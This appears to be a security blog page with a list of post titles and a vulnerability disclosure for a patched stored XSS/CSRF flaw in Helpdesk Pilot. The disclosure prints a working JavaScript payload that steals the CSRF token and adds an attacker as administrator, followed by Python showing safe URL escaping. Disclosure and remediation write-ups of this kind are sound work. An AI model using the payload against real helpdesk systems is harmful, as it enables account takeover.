College Graduation - 20 Nov 2014
Yahoo for the craic! - 21 Sep 2014
IRC what you did there... - 02 Aug 2014
Let me Bug you!? - 19 Jun 2014
Plesk 10 & 11 SSO XXE/XSS - 08 May 2014
Final Year Woes - 23 Apr 2014
SWMing in privilege, or drowning? - 10 Apr 2014
Lucid Surrealist Dreams and techno-lust. - 22 Mar 2014
New Raspberry piToy - 05 Feb 2014
Happy 2014! - 15 Jan 2014
Helpdesk Pilot Xss/CSRF Add an Admin - 30 Nov 2013
Squidoo.com $1,100 bug bounty - 01 Nov 2013
Yahoo Xss bug bounty - 01 Oct 2013
Moodle 2.0 Account Takeover - 04 Sep 2013
Xss Challenge Accepted - 17 Aug 2013
rpliy - rpi python web player - 25 Jul 2013
Busy times - 10 Jul 2013
Source Conference - 27 May 2013
Coinbase.com bug bounty - 04 May 2013
Xssive, Moodle and CSRF - 11 Apr 2013
Spoofing facebook content - 31 Mar 2013
Yahoo Pipes is Great! - 04 Mar 2013
Science Hack-day Dublin - 03 Mar 2013
Simple port scan - 26 Feb 2013
4chan-tool.py - 19 Feb 2013
Wix.com Xss - 11 Feb 2013
Crawl.py Url Crawling - 08 Feb 2013
Xssive Demo tool - 12 Jan 2013
Cyberbullying? - 27 Dec 2012
Merry XssMas - 24 Dec 2012
Watching BBC Streams - 10 Dec 2012
SWF Disassembly - 25 Nov 2012
C <3 - 16 Nov 2012
Greasemonkey XSS 2 - 21 Oct 2012
Work Logging App - 20 Oct 2012
Greasemonkey XSS - 29 Sep 2012
Guestbook XSS - 18 Sep 2012
OWASP Vicnum Project - 05 Sep 2012
August... - 05 Sep 2012
XSS Scenarios. - 30 Jul 2012
Imageroll - 05 Jul 2012
The Dangers of XSS - 14 Jun 2012
Facebook Canvas Graph - 08 Jun 2012
US Threat Gauge - 30 May 2012
Is this art? - 28 May 2012
Rss2Irc - 24 May 2012
Blackboard Xss Jungle - 14 May 2012
Url Info Scraper - 10 May 2012
pythonchallenge.com - 27 Apr 2012
Prime Generator - 15 Apr 2012
Sockso 1.51 Xss - 07 Apr 2012
Facebook Images - 03 Apr 2012
Google Hacking - 31 Mar 2012
Ubuntu 10.10 Hardening - 18 Mar 2012
2nd Year Revisited - 17 Mar 2012

Helpdesk Pilot Xss/CSRF Add an Admin

This bug allows a malicious party to add themselves as a helpdesk Administrator via a crafted Xss/CSRF combination. It affects all versions of the Helpdesk Pilot software. I have received confirmation from the developers that this bug has been patched in the latest version of this software. There is a video demonstration of this attack below.

The attacker submits a ticket containing a malicious Url which results in javascript execution. If an administrator views this ticket, the script performs a cross site request forgery in their session and adds the attacker as an admin. It is also possible to craft this attack for the case where a regular Staff account opens the ticket.

The bug is a result of incorrect escaping of a Url. For a simple proof of concept you can submit a ticket containing the following: http://makthepla.net/<script>alert(1);</script> This demonstrates that javascript execution is possible through submitting a ticket.

For a more malicious demonstration, as shown in the video, an admin could be added using a Url like the following.

http://makthepla.net/Add_admin_poc/<script>$(document).ready(function(){$.ajax({type:"POST",url:"http://poc.helpdeskpilot.net/staff/manage/staff/",data:"csrfmiddlewaretoken="+document.cookie.split('=')[1]+"&formtype=invite_staff&staff&first_name&last_name&email=ATTACKER@MAIL.COM&bulk_emails&role=1&categories=1",success:function(data){alert("Admin-Added-POC");},error:function(data){alert("POC_FAILED");}})});</script>

This submits a form that would add an administrator assuming the person viewing the ticket has administrator permissions.
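The root cause described above is that the submitted Url is written into the ticket page without escaping. The following is an added example, written for this post and not code from Helpdesk Pilot or from the original write-up, that contrasts the unsafe rendering pattern with a hardened one. It assumes the ticket Url is rendered as an HTML link; the function names and the rejection placeholder text are hypothetical, and the sample input is the proof-of-concept Url quoted in the post.

```python
import html
from urllib.parse import urlsplit

# Constructed sample input: the proof-of-concept Url from the post.
POC_URL = "http://makthepla.net/<script>alert(1);</script>"


def render_ticket_link_unsafe(url: str) -> str:
    """Interpolates the submitted Url straight into markup.

    This is the bug class the post describes: any '<script>' in the
    Url becomes live markup when an admin or staff member views the ticket.
    """
    return f'<a href="{url}">{url}</a>'


def is_safe_url(url: str) -> bool:
    """Accept only absolute http(s) Urls with a host.

    Rejects javascript:, data: and scheme-less values so that escaping
    is not the only line of defence for the href attribute.
    """
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_ticket_link_safe(url: str) -> str:
    """Escape the Url for both the attribute and the text context.

    html.escape with quote=True turns <, >, &, " and ' into entities, so the
    browser treats the value as data rather than markup.
    """
    if not is_safe_url(url):
        # Hypothetical placeholder shown instead of an invalid link.
        return "<em>[invalid link removed]</em>"
    escaped = html.escape(url, quote=True)
    return f'<a href="{escaped}" rel="noopener noreferrer">{escaped}</a>'


def contains_script_tag(markup: str) -> bool:
    """Simple check used here to show whether rendered markup still carries a script tag."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("unsafe:", render_ticket_link_unsafe(POC_URL))
    print("safe:  ", render_ticket_link_safe(POC_URL))
```

Note that the CSRF token in the post's payload is read from `document.cookie` by the injected script itself, so the form's CSRF protection offers nothing once script executes in the viewer's origin; the fix has to be on the output-escaping side, with the Url validation above as a second layer for the href attribute.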